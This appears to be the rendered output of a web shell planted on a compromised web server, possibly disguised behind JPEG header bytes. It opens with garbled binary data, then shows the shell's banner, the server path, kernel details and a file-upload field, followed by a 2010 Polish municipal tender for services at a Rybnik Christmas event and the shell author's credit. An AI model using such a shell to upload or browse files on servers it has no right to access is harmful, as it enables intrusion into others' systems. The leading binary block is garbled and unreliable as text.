JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/335739-N-2010.html

<p class="kh_header"><b>Rybnik: Obsługa projektu pn. II Rybnickie Boże Narodzenie i Kolędowanie, obejmująca:a)	usługę nagłośnienia, oświetlenia, obsługi akustycznej i technicznej przedsięwzięć kulturalnych realizowanych w ramach projektu,b)	przygotowanie degustacji potraw i wypieków świątecznych,c)	druk plakatów, ulotek, bannerów oraz kartek z życzeniami świątecznymi  i noworocznymi.</b><br>
<b>Numer ogłoszenia: 335739 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik , ul. B. Chrobrego 2, 44-200 Rybnik, woj. śląskie, tel. 032 4223011, faks 032 4224124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybnik.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa projektu pn. II Rybnickie Boże Narodzenie i Kolędowanie, obejmująca:a)	usługę nagłośnienia, oświetlenia, obsługi akustycznej i technicznej przedsięwzięć kulturalnych realizowanych w ramach projektu,b)	przygotowanie degustacji potraw i wypieków świątecznych,c)	druk plakatów, ulotek, bannerów oraz kartek z życzeniami świątecznymi  i noworocznymi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa projektu pn. II Rybnickie Boże Narodzenie i Kolędowanie, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego w latach 2007-2013, obejmująca:
a)usługę nagłośnienia, oświetlenia, obsługi akustycznej i technicznej przedsięwzięć kulturalnych realizowanych w ramach projektu,
b)przygotowanie degustacji potraw i wypieków świątecznych,
c)druk plakatów, ulotek, bannerów oraz kartek z życzeniami świątecznymi i noworocznymi.
Zakres zamówienia w części dotyczącej pkt. a) obejmuje zabezpieczenie pod ww. kątem następujących imprez kulturalnych, realizowanych w ramach niniejszego projektu:
1)impreza plenerowa pn. Mikołaj na Rynku - Inauguracja Jarmarku Bożonarodzeniowego (05.12.2010 r.):
a)NAGŁOŚNIENIE: o uznanej reputacji minimum 7kW na stronę, mikser minimum 32 wejścia, mikser monitorowy, 32 wejścia, 8 torów odsłuchowych, 8 jednakowych odsłuchów minimum 600W, 10 sztuk ATM 350, 
b)OŚWIETLENIE: 8szt. Mac 575, 6szt. Mac wash 250, 4szt. Alpha Beam, 10szt. Xeos EA 6080, 4 szt. LED PAR, Hazer, 2szt. Martin Atomic, Grand MA, c)  ESTRADA: zadaszona o wymiarach 10m x 8m, osłonięta z trzech stron, z konstrukcją do podwieszenia głośników.
2)oprawa muzyczna i artystyczna Jarmarku Bożonarodzeniowego na Rybnickim Rynku (11-12.12.2010 r.):a) NAGŁOŚNIENIE: wymagany jest system liniowy (preferowane np. Meyer, D&B, LAcustics, Nexo), konsoleta min. 48 wejść mono, procesory SPX 990, Lexicon PCM 80, mikser monitorowy 48 wejść mono,1 2 torów monitorowych, 10 jednakowych (D&B, Nexo, EAW), Side fill minimum 1,5 kWb) OŚWIETLENIE: 8 szt. Mac 575, 6 szt. Mac wash 250, 6 szt. Alpha Beam, 12 szt. Xeos EA 6080, 4 szt. LED PAR, Hazer, 2 szt. Martin Atomic, Grand Ma,c)  ESTRADA: zadaszona o wymiarach 10m x 8m, osłonięta z trzech stron, z konstrukcją do podwieszenia głośników.
3)oprawa muzyczna i artystyczna Jarmarku Bożonarodzeniowego na Rybnickim Rynku (18-19.12.2010 r.):
a) NAGŁOŚNIENIE: PA: system liniowy (preferowane np. Meyer, D&B, LAcustics, Nexo), konsoleta min. 48 wejść mono, procesory SPX 990, Lexicon PCM 80, mikser monitorowy 48 wejść mono, 12 torów monitorowych, 10 jednakowych (D&B, Nexo, EAW), Side fill minimum 1,5 kW, 12 mikrofonów nagłownych, 17 jednakowych mikrofonów do chóru gospel,
b)OŚWIETLENIE: 8 szt. Mac 575, 6 szt. Mac wash 250, 6 szt. Alpha Beam, 12 szt. Xeos EA 6080, 4 szt. LED PAR, Hazer, 2 szt. Martin Atomic, Grand Ma,c)  ESTRADA: zadaszona o wymiarach 10m x 8m, osłonięta z trzech stron, z konstrukcją do podwieszenia głośników.
4)koncert noworoczny w wykonaniu wybranej przez Zamawiającego gwiazdy polskiej sceny muzycznej (np. Mieczysław Szcześniak, Robert Janowski, Justyna Steczkowska, Zbigniew Wodecki, itp.) w repertuarze świątecznym (styczeń 2011 r.).  Termin koncertu zostanie ustalony do dnia 15 grudnia 2010 r. Koncert odbędzie się w kościele p.w. św. Jadwigi Śląskiej w Rybniku, ul. Kardynała Kominka 18 (dzielnica Nowiny). Zamawiający zastrzega sobie możliwość zmiany miejsca organizacji koncertu tj. w innym kościele o podobnej powierzchni i warunkach akustycznych na terenie Miasta Rybnika.    
a) NAGŁOŚNIENIE (minimum): PA: system o uznanej reputacji np. Meyer, D&B, Dynacord Cobra, mikser 24 kanały wejściowe Midas, Crest, itp., konsoleta monitorowa-10 torów, 8 jednakowych głośników typu wedge, peryferia: equalizery Klark Teknik, procesory dynamiczne: drowmer.BSS, procesory efektów: Lexicon PCM, SPX 990,
b)OŚWIETLENIE (minimum): Grand Ma, 8 szt. Mac 575, 12 szt. Mac wash 250, 18 szt. Xeos EA 6080, 10 szt. Flash LED, 10 szt. PC, Follow Spot, 3 szt. Binder.
c)KONSTRUKCJE: budowa podestu scenicznego o powierzchni 50 m2 wraz z kratą aluminiową o długości 2m x 12m i przekroju 39 cm.Wykonawca zobowiązany jest do zapewnienia ogrzewania sceny we wskazanych wyżej terminach (min. 3 nagrzewnice o mocy 80 kW każda, 4 parasole grzewcze wraz z paliwem). 
Zakres zamówienia w części dotyczącej pkt. b) obejmuje przygotowanie i dostarczenie w dniu 19 grudnia 2010 r. na Rybnicki Rynek degustacji potraw i wypieków świątecznych dla uczestników imprezy plenerowej organizowanej z okazji zakończenia Jarmarku Bożonarodzeniowego, realizowanego w ramach projektu pn.: II Rybnickie Boże Narodzenie i Kolędowanie, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. Degustacja potraw świątecznych będzie obejmować:
1.600 porcji karpia pieczonego z kapustą i ziemniakami (300 g na porcję), w tym:
a.karp pieczony - 100 g,
b.kapusta zasmażana z grzybami - 100 g,
c.ziemniaki pure - 100 g,
d.tacka papierowa,
e.widelec PCV. 
2.500 porcji rolmopsa w śmietanie z kapustą i ziemniakami (280 g na porcję), w tym:
a.rolmops w śmietanie - 80 g,
b.gotowana kapusta kiszona - 100 g,
c.ziemniaki pure - 100 g,
d.tacka papierowa,
e.widelec PCV. 
3.500 porcji barszczu z uszkami (250 g na porcję) podawanych w misce styropianowej z łyżką PCV,
4.500 porcji zupy grzybowej (250 g na porcję) podawanych w misce styropianowej z łyżką PCV.
Degustacja wypieków świątecznych będzie obejmować:
1.10 porcjowanych blach kołacza śląskiego (40x70cm) w dwóch smakach (ser, mak) - podawanych na papierowych serwetkach,
2.10 kg ciasteczek świątecznych (piernik, kokosanki, kruche ciasteczka) - podawanych na papierowych serwetkach.
Dodatkowe informacje, dotyczące zobowiązań Wykonawcy:
1.zapewnienie stoiska gastronomicznego wraz ze świątecznym wystrojem oraz obsługą,
2.terminowe dostarczenie posiłków na Rybnicki Rynek transportem zabezpieczonym na własny koszt,
3.pozostawanie w stałym kontakcie z Zamawiającym (spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mailowy),
4.zagwarantowania:
a.najwyższego poziomu świadczonych usług - m.in. dostarczenia świeżych wypieków i potraw przyrządzonych w dniu dostawy;
b.przewiezienia wypieków i potraw odpowiednimi środkami transportu, zgodnie z obowiązującymi w tym zakresie przepisami, z zachowaniem warunków higieny;
c.obsługi świadczonych usług na właściwym poziomie, przez osoby posiadające stosowne uprawnienia, zgodnie z obowiązującymi w tym zakresie przepisami. Zamawiający zastrzega sobie prawo do kontroli pracy Wykonawcy i ostatecznego podejmowania decyzji,  w zakresie niepełnej realizacji przedmiotu zamówienia. Zakres zamówienia w części dotyczącej pkt. c) obejmuje: 
1) druk 2.600 sztuk kartek z życzeniami świątecznymi i noworocznymi o formacie 10 cm x 15 cm, papier kredowy min. 200g/m2, nadruk dwustronny: pierwsza strona - pełny kolor, lakierowana, II strona nadruk monochromatyczny - na podstawie przekazanego wzoru,
2)bannery o następujących parametrach i w niżej wskazanych ilościach:
a)o wymiarach 1,5m x 6m, jednostronny, oczkowany w pełnym kolorze - 1 szt.,
b)o wymiarach 1m x 3m, jednostronny, oczkowany w pełnym kolorze - 1szt.,
c)o wymiarach 1m x 2m, jednostronne, w pełnym kolorze, na konstrukcjach z tworzywa sztucznego (stojakach umożliwiających zawieszenie banerów) - 3 szt,
d)o wymiarach 1,5m x 6m, dwustronne, z metalową linką zintegrowaną w górnej części baneru o długości ok. 20m oraz 2 oczkami w części dolnej baneru - 2 szt.
3)  druki o następujących parametrach i w niżej wskazanych ilościach:
a)2 x 700 sztuk plakatów w formacie B1, nadruk jednostronny w pełnym kolorze, papier kredowany 170g/m2,
b)2 x 8.000 sztuk ulotek w formacie od A4 do DL (falcowane w U), nadruk dwustronny w pełnym kolorze, gramatura 135g/m2, lakierowane, 
c)2 x 40 sztuk plakatów o wymiarach 124 cm x 53,5 cm w orientacji poziomej, nadruk jednostronny w pełnym kolorze, gramatura 170g/m2,
d)2 x 2 szt. citylightów o wymiarach 180 cm x 110 cm, z nadrukiem jednostronnym w pełnym kolorze. 
INFORMACJE DODATKOWE:
1.Wykonawca jest zobowiązany w ciągu 2 dni roboczych do przekazania Zamawiającemu dwóch wstępnych projektów graficznych poligrafii w formie elektronicznej, w formacie JPG, obejmujących m.in. opracowanie szaty graficznej, całościowej kompozycji sposobu rozmieszczenia elementów tekstowych i graficznych (wybrany projekt zostanie wykorzystany zarówno w I jak i w II etapie realizacji zadania - część grudniowa i część styczniowa projektu).
2.Zamawiający w terminie 1 dnia roboczego od daty otrzymania wstępnych projektów graficznych wybierze jeden do dalszych prac oraz naniesie wszelkie uwagi. Wykonawca w ciągu jednego dnia roboczego uwzględni uwagi Zamawiającego do projektu, przygotuje jego ostateczną wersję w formie elektronicznej w formacie JPG i przekaże przed skierowaniem do druku Zamawiającemu do akceptacji. Zamawiający dokona ostatecznej akceptacji w terminie 1 dnia roboczego. 
3.Motyw graficzny powinien być spójny dla każdego z elementów poligrafii (za wyjątkiem bannerów, które nie muszą posiadać dat realizacji przedsięwzięcia),
4.Wszystkie materiały poligraficzne muszą być przygotowane zgodnie z aktualnie obowiązującą instrukcją zamieszczoną w Wytycznych Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla Beneficjentów w zakresie informacji i promocji, która dostępna jest na stronie internetowej www.rpo.slaskie.pl oraz zawierać logo Rybnik. Miasto z ikrą.,
5.Terminy dostarczenia materiałów do Urzędu Miasta Rybnika:
a)pierwszy etap: do 10 dni od daty zawarcia umowy,
b)drugi etap: do 23 grudnia  2010.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.37.00.00-5, 79.82.00.00-8, 79.34.22.00-5, 55.32.00.00-9, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rybnik.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2010 godzina 10:00, miejsce: Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest z zewnętrznych źródeł finansowania w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 (85%)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com